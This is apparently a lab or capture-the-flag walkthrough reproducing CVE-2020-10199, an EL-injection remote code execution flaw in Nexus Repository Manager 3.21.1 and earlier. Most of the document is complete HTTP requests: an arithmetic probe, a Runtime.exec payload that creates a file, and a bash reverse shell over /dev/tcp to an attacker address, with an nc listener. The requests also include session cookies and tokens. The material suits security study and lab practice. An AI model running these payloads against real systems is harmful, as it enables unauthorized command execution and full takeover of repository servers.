Nexus Repository Manager 3 remote command execution vulnerability (CVE-2020-10199)

Vulnerability name

Nexus Repository Manager 3 remote command execution vulnerability (CVE-2020-10199)
Summary

On 31 March 2020 Sonatype published a security advisory for CVE-2020-10199, a remote code execution vulnerability in Nexus Repository Manager 3. Sonatype Nexus is a repository manager, best known as a Maven repository server: it offers repository management and artifact search, and is commonly run as a private Maven mirror that proxies remote repositories while keeping a local copy to save bandwidth and time. In Nexus Repository Manager OSS/Pro 3.21.1 and earlier, a user-supplied value is interpolated into a validation message and evaluated as a Java EL (Expression Language) expression, so an authenticated attacker can send a crafted HTTP request and execute arbitrary code on the server in the context of the Nexus service account. Exploitation requires an account of any type; it does not need administrator rights.
Affected versions

Nexus Repository Manager OSS/Pro 3.x <= 3.21.1 (fixed in 3.21.2)

Reproduction

Step 1: start the environment and confirm that the web UI is reachable.


The injection point is in the group-repository creation API, which only accepts requests from an authenticated user, so first log in to the web UI with admin:admin (the default credentials of this lab environment).

After logging in, take the session cookie (NXSESSIONID) and the NX-ANTI-CSRF-TOKEN value from any request; both are reused in the requests below.

Step 2: capture a request in Burp and rewrite it into the following. Burp recalculates Content-Length when the body is edited; if you send the request by hand, set it to the real body length. The member name is the injection point: after JSON decoding, \\A becomes \A, so the value never contains a literal ${ (which would be rejected) but is still evaluated as an EL expression by the validation message interpolator. A vulnerable target answers with a validation error whose message contains the evaluated result, 216, rather than the expression itself.

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.179.162:42407
Content-Length: 233
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.6472159469278993
Content-Type: application/json
Accept: */*
Origin: http://192.168.179.162:42407
Referer: http://192.168.179.162:42407/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.6472159469278993; _ga=GA1.1.672464578.1686021722; _gid=GA1.1.1450571530.1686021722; _gcl_au=1.1.1882043501.1686021723; ln_or=eyIzOTIwOSI6ImQifQ%3D%3D; _uetsid=529a13d0041911ee8ed189b38c8ed7b5; _uetvid=529a79c0041911eea94f692ae4cd89ee; _ga_2TMM6KZPXQ=GS1.1.1686021737.1.0.1686021738.59.0.0; NXSESSIONID=a9033046-7d5a-4b99-945c-b1ef546337b9
Connection: close

{
    "name": "internal",
    "online": true,
    "storage": {
        "blobStoreName": "default",
        "strictContentTypeValidation": true
    },
    "group": {
        "memberNames": ["$\\A{6*6*6}"]
    }
}

Now swap the 6*6*6 for an expression that runs a command; this one creates the file /tmp/Nexus on the server. ''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null) obtains the Runtime instance by reflection without spelling out Runtime.getRuntime() in the expression. Index 6 is where getRuntime() sat in getMethods() on the author's JVM; the order of Class.getMethods() is not specified, so on a different Java build the index may need adjusting. Confirm the result with ls -l /tmp/Nexus inside the container.

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.179.162:42407
Content-Length: 233
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.6472159469278993
Content-Type: application/json
Accept: */*
Origin: http://192.168.179.162:42407
Referer: http://192.168.179.162:42407/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.6472159469278993; _ga=GA1.1.672464578.1686021722; _gid=GA1.1.1450571530.1686021722; _gcl_au=1.1.1882043501.1686021723; ln_or=eyIzOTIwOSI6ImQifQ%3D%3D; _uetsid=529a13d0041911ee8ed189b38c8ed7b5; _uetvid=529a79c0041911eea94f692ae4cd89ee; _ga_2TMM6KZPXQ=GS1.1.1686021737.1.0.1686021738.59.0.0; NXSESSIONID=a9033046-7d5a-4b99-945c-b1ef546337b9
Connection: close

{
    "name": "internal",
    "online": true,
    "storage": {
        "blobStoreName": "default",
        "strictContentTypeValidation": true
    },
    "group": {
        "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/Nexus')}"]
    }
}

Step 3: start a listener on the attacking host (10.0.16.122 port 8888 here, for example with nc -lvnp 8888) and send the reverse-shell payload. Runtime.exec(String) splits its argument on whitespace before bash ever sees it, so the inner command uses $IFS in place of spaces to remain a single argument to bash -c.

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.179.162:42407
Content-Length: 233
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.6472159469278993
Content-Type: application/json
Accept: */*
Origin: http://192.168.179.162:42407
Referer: http://192.168.179.162:42407/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.6472159469278993; _ga=GA1.1.672464578.1686021722; _gid=GA1.1.1450571530.1686021722; _gcl_au=1.1.1882043501.1686021723; ln_or=eyIzOTIwOSI6ImQifQ%3D%3D; _uetsid=529a13d0041911ee8ed189b38c8ed7b5; _uetvid=529a79c0041911eea94f692ae4cd89ee; _ga_2TMM6KZPXQ=GS1.1.1686021737.1.0.1686021738.59.0.0; NXSESSIONID=a9033046-7d5a-4b99-945c-b1ef546337b9
Connection: close

{
    "name": "internal",
    "online": true,
    "storage": {
        "blobStoreName": "default",
        "strictContentTypeValidation": true
    },
    "group": {
        "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/10.0.16.122/8888<&1')}"]
    }
}

Step 4: read the flag from the reverse shell.
